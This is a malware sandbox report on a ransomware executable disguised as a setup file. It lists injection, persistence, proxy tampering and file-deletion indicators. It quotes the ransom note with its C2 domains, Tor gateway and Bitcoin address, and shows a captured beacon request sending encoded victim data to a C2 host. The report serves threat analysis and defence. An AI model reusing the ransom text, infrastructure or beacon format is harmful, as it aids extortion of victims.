What is https://www.hybrid-analysis.com?

Analysis Overview

Submission name:

Set-up.exe

Other submission names

  • Set-up install.exe
  • Set-up.original.exe
  • Set.up.exe
  • Setup.exe
  • file

Mime:

application/x-dosexec

Operating System:

Windows

Last Anti-Virus Scan:

08/05/2022 00:18:02 (UTC)

Last Sandbox Report:

08/03/2021 12:58:02 (UTC)

malicious

Threat Score: 65/100

Anti-Virus Results

CrowdStrike Falcon (Static Analysis and ML)

Last Update: 08/05/2022 00:18:02 (UTC)

MetaDefender (Multi Scan Analysis)

Last Update: 08/05/2022 00:18:02 (UTC)

VirusTotal (Multi Scan Analysis)

Last Update: 08/05/2022 00:18:02 (UTC)

Falcon Sandbox Reports

Incident Response

Risk Assessment

Network Behavior: Contacts 2 domains and 2 hosts.

Indicators

Not all malicious and suspicious indicators are displayed.

  • Exploit/Shellcode
    • Writes shellcode to a remote process

      Details:
      Wrote 106 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 292 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 66 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 48 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 185 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 293 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 234 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 519 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 98 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Wrote 12 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
      Source: Hybrid Analysis Technology, relevance 8/10

  • General
    • Sample was identified as malicious by at least one Antivirus engine

      Details: 3/57 Antivirus vendors marked sample as malicious (5% detection rate)
      Source: External System, relevance 10/10

  • Installation/Persistence
    • Allocates virtual memory in foreign process

      Details:
      "" allocated 00000088 bytes of memory in "risjrov.exe" (Protection: "read/write")
      "" allocated 00000088 bytes of memory in "cmd.exe" (Protection: "read/write")
      Source: API Call, relevance 7/10

    • Writes a PE file header to disc

      Details:
      "" wrote 65536 bytes starting with PE header signature to file "%LOCALAPPDATA%\risjrov.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ...
      Source: API Call, relevance 1/10

    • Writes data to a remote process

      Details:
      "" wrote 32 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 52 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 4 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 1024 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 234496 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 30208 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 27648 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 512 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
      "" wrote 32 bytes to a foreign process "risjrov.exe" (PID: 00001380)
      Source: API Call, relevance 6/10

  • Network Related
    • Found more than one unique User-Agent

      Details: Found the following User-Agents:
      Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
      Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
      Source: Network Traffic, relevance 5/10

  • Ransomware/Banking
    • Detected indicator that file is ransomware

      Details:
      "All your documents, photos, databases and other important files have been encrypted
      with strongest encryption RSA-2048 key, generated for this computer.

      Private decryption key is stored on a secret Internet server and nobody can
      decrypt your files until y" (Source: 00113343-00002640-7731F918-128658, Indicator: "decrypt your files")
      "All your documents, photos, databases and other important files have been encrypted
      with strongest encryption RSA-2048 key, generated for this computer.

      Private decryption key is stored on a secret Internet server and nobody can
      decrypt your files un" (Source: 25712-59-004051C0, Indicator: "decrypt your files")
      "All your important files are encrypted!" (Source: 25712-918-00406200, Indicator: "files are encrypted")
      "The only copy of the private key, which will allow you to decrypt your files,is located on a secret TOR
      server in the Internet; the server will eliminate the key after a time period specified in this window." (Source: 25712-918-00406200, Indicator: "decrypt your files")
      "iles until you pay and obtain the private key.

      If you see the main encryptor red window, examine it and follow the instructions.
      Otherwise, it seems that you or your antivirus deleted the encryptor program.
      Now you have the last chance to decrypt your files.
      Open in your browser one of the links:
      http://iq3ahijcfeont3xx.fenaow48fn42.com
      http://iq3ahijcfeont3xx.sm4i8smr3f43.com
      https://iq3ahijcfeont3xx.tor2web.blutmagie.de
      They are public gates to the secret server.
      Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
      %s
      Follow the instructions on the server.

      If you have problems with gates, use direct connection:
      1. Download Tor Browser from http://torproject.org
      2. In the Tor Browser open the http://iq3ahijcfeont3xx.onion/
      Note that this server is available via Tor Browser only.
      Retry in 1 hour if site is not reachable.
      Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
      %s
      Follow the instructi" (Source: 00101562-00001540.00000000.104296.400000.00000040.mdmp, Indicator: "decrypt your files")
      "ur files until you pay and obtain the private key.

      If you see the main encryptor red window, examine it and follow the instructions.

      Otherwise, it seems that you or your antivirus deleted the encryptor program.

      Now you have the last chance to decrypt your files.

      Open in your browser one of the links:

      http://iq3ahijcfeont3xx.fenaow48fn42.com

      http://iq3ahijcfeont3xx.sm4i8smr3f43.com

      https://iq3ahijcfeont3xx.tor2web.blutmagie.de

      They are public gates to the secret server.

      Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.

      %s

      Follow the instructions on the server.

      If you have problems with gates, use direct connection:

      1. Download Tor Browser from http://torproject.org

      2. In the Tor Browser open the http://iq3ahijcfeont3xx.onion/

      Note that this server is available via Tor Browser only.

      Retry in 1 hour if site is not reachable.

      Copy and paste the following Bitcoin address in the input form on server. Avoid missprints." (Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files")
      "which will allow you to decrypt your files,is located on a secret TOR" (Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files")
      "All your documents, photos, databases and other important files have been encrypted
      with strongest encryption RSA-2048 key, generated for this computer.

      Private decryption key is stored on a secret Internet server and nobody can
      decrypt your files until you pay and obtain the private key.

      If you see the main encryptor red window, examine it and follow the instructions.
      Otherwise, it seems that you or your antivirus deleted the encryptor program.
      Now you have the last chance to decrypt your files.
      Open in your browser one of the links:
      http://iq3ahijcfeont3xx.fenaow48fn42.com
      http://iq3ahijcfeont3xx.sm4i8smr3f43.com
      https://iq3ahijcfeont3xx.tor2web.blutmagie.de
      They are public gates to the secret server.
      Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
      16gpagzWUuxphi3ZwyjoXdqA5HUZR68mwa
      Follow the instructions on the server.

      If you have problems with gates, use direct connection:
      1. Download Tor Browser from http://torproject.org
      2. In the" (Source: 00113343-00002640.00000001.149687.400000.00000040.mdmp, Indicator: "decrypt your files")
      "All your documents, photos, databases and other important files have been encrypted" (Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "files have been encrypted")
      "Private decryption key is stored on a secret Internet server and nobody can" (Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "private decryption key")

      Source: String, relevance 9/10

    • The input sample dropped a known ransomware file

      Details: Found dropped filename "RECOVERY_FILE.TXT", which has been seen in the context of ransomware
      Source: Extracted File, relevance 5/10

  • Spyware/Information Retrieval
    • Accesses potentially sensitive information from local browsers

      Details:
      "risjrov.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile")
      "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat" (Type: "FileHandle", Context: "NtSetInformationFile")
      "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat" (Type: "FileHandle", Context: "NtSetInformationFile")
      Source: Touched Handle, relevance 5/10

  • System Security
    • Modifies proxy settings

      Details:
      "" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
      "" (Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
      "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000")
      "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER")
      "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE")
      "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
      "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
      Source: Registry Access, relevance 8/10

    • Queries/modifies the display settings of system associated file extensions

      Details:
      "" (Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "ALWAYSSHOWEXT")
      "" (Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "NEVERSHOWEXT")
      Source: Registry Access, relevance 7/10

  • Unusual Characteristics
    • Contains native function calls
    • Spawns a lot of processes

      Details:
      Spawned process ""
      Spawned process ""
      Spawned process "risjrov.exe"
      Spawned process "risjrov.exe"
      Spawned process "cmd.exe" with commandline "/c del C:\300DE5~1 >> NUL"
      Source: Monitored Target, relevance 8/10

  • Anti-Detection/Stealthiness
    • Sets the process error mode to suppress error box

      Details:
      "" set its error mode to SEM_NOOPENFILEERRORBOX
      "risjrov.exe" set its error mode to SEM_NOOPENFILEERRORBOX
      Source: API Call, relevance 8/10

  • Anti-Reverse Engineering
    • Contains ability to register a top-level exception handler (often used as anti-debugging trick)

      Details:
      from PID 00001220
      from PID 00001220
      from PID 00001220
      from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b (PID: 1220)
      from PID 00001220
      from PID 00001220
      from PID 00001540
      from PID 00001540
      from PID 00001540
      from PID 00001540
      Source: Hybrid Analysis Technology, relevance 1/10

  • Environment Awareness
    • Contains ability to query the machine version
    • Possibly tries to detect the presence of a debugger

      Details:
      from PID 00001540
      from PID 00001540
      from PID 00002640
      from PID 00002640
      Source: Hybrid Analysis Technology, relevance 1/10

    • Possibly tries to implement anti-virtualization techniques

      Details: "AdSv - vmsrvc.sys - Virtual Machines Additions Service" (Indicator: "vmsrvc")
      Source: String, relevance 4/10

    • Reads the cryptographic machine GUID

      Details: "risjrov.exe" (Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID")
      Source: Registry Access, relevance 10/10

  • General
    • Reads configuration files

      Details:
      "" read file "C:\Windows\win.ini"
      "" read file "%USERPROFILE%\Desktop\desktop.ini"
      "risjrov.exe" read file "C:\Windows\win.ini"
      "risjrov.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
      Source: API Call, relevance 4/10

  • Installation/Persistence
    • Drops executable files

      Details: "risjrov.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
      Source: Extracted File, relevance 10/10

    • Modifies auto-execute functionality by setting a value in the registry

      Details:
      "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
      "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
      "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "%LOCALAPPDATA%\risjrov.exe")
      "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
      "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "C:\Users\%USERNAME%\AppData\Local\risjrov.exe")
      Source: Registry Access, relevance 8/10

  • Network Related
    • Found potential IP address in binary/memory

      Details: "85.25.146.22"
      Source: String, relevance 3/10

    • Found potential URL in binary/memory

      Details:
      "http://ipinfo.io/ip"
      "http://iq3ahijcfeont3xx.fenaow48fn42.com/?enc=%s"
      "http://iq3ahijcfeont3xx.sm4i8smr3f43.com"
      "http://www.torproject.org/projects/torbrowser.html.en"
      "https://iq3ahijcfeont3xx.tor2web.blutmagie.de"
      Source: String, relevance 2/10

  • Spyware/Information Retrieval
    • Contains ability to enumerate processes/modules/threads

      Details:
      at 00113343-00002640-773301AA-121019
      at 00113343-00002640-773301AA-121035
      from PID 00002640
      from risjrov.exe (PID: 2640)
      Source: Hybrid Analysis Technology, relevance 5/10

    • Contains ability to open the clipboard
  • System Destruction
    • Marks file for deletion

      Details:
      "%LOCALAPPDATA%\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" for deletion
      "C:\Users\%USERNAME%\AppData\Local\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" for deletion
      Source: API Call, relevance 10/10

    • Opens file with deletion access rights

      Details:
      "risjrov.exe" opened "C:\MSOCache\All Users\{90120000-006E-0407-0000-0000000FF1CE}-C\Microsoft.VC80.CRT.manifest" with delete access
      "risjrov.exe" opened "%PROGRAMFILES%\Application Verifier (x64)\REDIST.TXT" with delete access
      "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\dml.doc" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\license.txt" with delete access
      "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\redist.txt" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt" with delete access
      "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt" with delete access
      Source: API Call, relevance 7/10

  • System Security
    • Adjusts debug privileges

      Details:
      "" adjusted SE_DEBUG_PRIVILEGE
      "risjrov.exe" adjusted SE_DEBUG_PRIVILEGE
      Source: API Call, relevance 3/10

  • Unusual Characteristics
    • Imports suspicious APIs

      Details:
      GetThreadContext
      CreateProcessW
      LoadLibraryW
      GetModuleFileNameW
      GetProcAddress
      VirtualAllocEx
      WriteProcessMemory
      GetModuleHandleW
      GetCommandLineA
      GetStartupInfoW
      TerminateProcess
      UnhandledExceptionFilter
      IsDebuggerPresent
      WriteFile
      GetModuleFileNameA
      GetTickCount
      Sleep
      Source: Static Parser, relevance 1/10

    • Reads information about supported languages

      Details:
      "risjrov.exe" (Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407")
      "cmd.exe" (Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407")
      Source: Registry Access, relevance 3/10

  • Hiding 12 Suspicious Indicators

  • Environment Awareness
    • Contains ability to query machine time

      Details:
      from PID 00001220
      from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b (PID: 1220)
      from PID 00001540
      from PID 00001540
      from PID 00001540
      from PID 00001540
      from PID 00001540
      from PID 00001540
      from PID 00001380
      from risjrov.exe (PID: 1380)
      Source: Hybrid Analysis Technology, relevance 1/10

  • General
    • Contacts domains

      Details:
      "ipinfo.io"
      "24u4jf7s4regu6hn.fenaow48fn42.com"
      Source: Network Traffic, relevance 1/10

    • Contacts server

      Details:
      "54.93.61.143"
      "104.27.142.176"
      Source: Network Traffic, relevance 1/10

    • Creates mutants

      Details:
      "Local\ZonesCounterMutex"
      "Local\ZoneAttributeCacheCounterMutex"
      "Local\ZonesCacheCounterMutex"
      "Local\ZonesLockedCacheCounterMutex"
      "Local\_!MSFTHISTORY!_"
      "Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
      "Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
      "Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
      "Local\WininetStartupMutex"
      "Local\WininetConnectionMutex"
      Source: Created Mutant, relevance 3/10

    • GETs files from a webserver

      Details:
      "GET /ip HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
      Host: ipinfo.io"
      "GET /ping.php?U3ViamVjdD1QaW5nJmtleT02MzY3QkVENTYwMDBBNjBCMkYyQzhBNzJGRkNDNEU0ODA5NTY2MDY4QTczQTc0RDAwRjk4QzcxNThENzVBOEM1JmFkZHI9MTZncGFneldVdXhwaGkzWnd5am9YZHFBNUhVWlI2OG13YSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuNC4wYSZPUz03NjAxJklEPTg4JnN1YmlkPTAmZ2F0ZT1HMCZpc19hZG1pbj0xJmlzXzY0PTEmaXA9ODUuMjUuMTQ2LjIy HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
      Host: 24u4jf7s4regu6hn.fenaow48fn42.com
      Connection: Keep-Alive"
      Source: Network Traffic, relevance 5/10

    • Loads modules at runtime

      Details:
      "" loaded module "%WINDIR%\SYSTEM32\APPHELP.DLL" at base 747F0000
      "" loaded module "PROPSYS.DLL" at base 74630000
      "" loaded module "OLE32.DLL" at base 75250000
      "" loaded module "COMCTL32.DLL" at base 74B40000
      "" loaded module "OLEAUT32.DLL" at base 76CA0000
      "" loaded module "ADVAPI32.DLL" at base 75A10000
      "" loaded module "SHELL32.DLL" at base 75F50000
      "" loaded module "C:\WINDOWS\SYSTEM32\PROPSYS.DLL" at base 74630000
      "" loaded module "NTMARTA.DLL" at base 745C0000
      Source: API Call, relevance 1/10

    • Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)

      Details: 10 entries, each with an empty process name ("")
      Source: API Call, relevance 1/10

    • Runs shell commands

      Details: "/c del C:\300DE5~1 >> NUL" on 2015-05-14.17:06:09
      Source: Monitored Target, relevance 5/10

  • Installation/Persistence
    • Contains ability to lookup the windows account name

      Details:
      at 00101562-00001540-773301AA-115708
      at 00113343-00002640-773301AA-133152
      Source: Hybrid Analysis Technology, relevance 5/10

    • Dropped files

      Details:
      "risjrov.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
      "storage.bin" has type "data"
      "RECOVERY_FILE.TXT" has type "ASCII text, with CRLF line terminators"
      "log.html" has type "HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators"
      "HELP_RESTORE_FILES_stosh.TXT" has type "ASCII text, with CRLF line terminators"
      "Microsoft.VC80.CRT.manifest" has type "XML document text"
      "REDIST.TXT" has type "data"
      "ip[1].txt" has type "ASCII text"
      "dml.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0"
      "kernel_debugging_tutorial.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0"
      Source: Extracted File, relevance 3/10

File Details

All Details:

hfxtnsu.exe

Filename: hfxtnsu.exe
Size: 375KiB (383488 bytes)
Type: peexe executable
Description: PE32 executable (GUI) Intel 80386, for MS Windows
Architecture: WINDOWS
SHA256: 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b

Visualization

Input File (PortEx)

Classification (TrID)

  • 67.3% (.EXE) Win32 Executable MS Visual C++ (generic)
  • 14.2% (.DLL) Win32 Dynamic Link Library (generic)
  • 9.7% (.EXE) Win32 Executable (generic)
  • 4.3% (.EXE) Generic Win/DOS Executable
  • 4.3% (.EXE) DOS Executable Generic

Screenshots

Hybrid Analysis

Analysed 5 processes in total.

Network Analysis

DNS Requests

HTTP Traffic

Extracted Files

Displaying 32 extracted file(s). The remaining 251 file(s) are available in the full version and XML/JSON reports.

    • HELP_RESTORE_FILES_stosh.TXT
    • Microsoft.VC80.CRT.manifest
    • REDIST.TXT
    • dml.doc

      Size: 111KiB (113900 bytes)
      Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0
      MD5: 9759d0d191d542f59b657e5d308094bb
      SHA1: 04b43ba5b5add678ac7fbb1ca687b8c39e4bc666
      SHA256: d31f8885d924b3a5928b260b05f60f1afa4993e9f400950c7f3df9dfd2164f70

    • kernel_debugging_tutorial.doc

      Size: 2.3MiB (2392300 bytes)
      Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0
      MD5: 83e4a132a62e1a2fe3bbcc088681979d
      SHA1: a01140b6c34571c48db54e3bb0887acabbb60760
      SHA256: a91fd55fc64f0678ca6ecfbd409e1172cbc3536722335d52516ca554673942cb

    • license.txt
    • relnotes.txt
    • readme.txt
    • srcsrv.doc

      Size: 217KiB (222444 bytes)
      Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Source Server, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Sat Jun 17 20:09:00 2006, Create Time/Date: Tue Sep 25 21:45:00 2007, Last Saved Time/Date: Thu Mar 20 22:48:00 2008, Number of Pages: 19, Number of Words: 6614, Number of Characters: 37706, Security: 0
      MD5: a7600489849fbeacc95d06ac70756d5c
      SHA1: 5cd7934d2a3b1c6628d2c407dd2c2f674b2bbe1d
      SHA256: 2bb9bec411d1e87d1d150e9b01bc919ac5d7bd415ebbd9b49652930bd1051651

    • symhttp.doc

      Size: 542KiB (555244 bytes)
      Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: HTTP Symbol Stores and the Symbol Server Proxy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:49:00 2007, Last Saved Time/Date: Tue Sep 25 21:49:00 2007, Number of Pages: 19, Number of Words: 4139, Number of Characters: 21611, Security: 0
      MD5: 246be13e750d0023f720e9b449226f44
      SHA1: 719632fe06de246a473d0e2ce19af3da7aca9aea
      SHA256: 06c9ad0a058a1f52d21b8d69b4cb7d4a72618d6bb5e08d54e0522c18317ee136

    • themes.doc

      Size: 1.1MiB (1102060 bytes)
      Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: WinDbg Themes, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:04:00 2007, Last Saved Time/Date: Tue Sep 25 21:04:00 2007, Number of Pages: 6, Number of Words: 491, Number of Characters: 2780, Security: 0
      MD5: 4344b6b0cad35480dea522d4329a00af
      SHA1: 2a828e437afba57f61d4a9abcc8d5f7a91079983
      SHA256: f78f42c7c94f836631168213696575b9cff3902df7dc1acf4bfa69d8a6055e04

    • pooltag.txt
    • Mso Example Intl Setup File A.txt
    • Mso Example Intl Setup File B.txt
    • Mso Example Setup File A.txt
    • troubleshootingtest.psd1
    • sign.js
    • fxref_Microsoft.JScript.Vsa.hxs

      Size: 301KiB (307832 bytes)

    • fxref_Microsoft.SqlServer.Server.hxs

      Size: 1.2MiB (1213326 bytes)

    • fxref_System.Data.Linq.Mapping.hxs

      Size: 985KiB (1008588 bytes)

    • sample.docx
    • omniprov.doc

      Size: 306KiB (313580 bytes)

    • DbgSpec.doc
    • testEE.cer
    • contoso.cer
    • contosoroot.cer
    • TestCertificate.cer
    • MigratingToAeroWizards.doc

      Size: 832KiB (852204 bytes)

    • IFileIsInUse_sample.docx

      Size: 385KiB (393914 bytes)

    • Using the System Folder View.doc

      Size: 519KiB (531692 bytes)

    • risjrov.exe
    • storage.bin

Notifications

  • Not all strings are visible in the report, because the maximum number of strings was reached (5000)
  • Parsed more than maximum number of dropped files (20), report might not contain information about some dropped files
  • Some API calls are hidden from the report due to oversize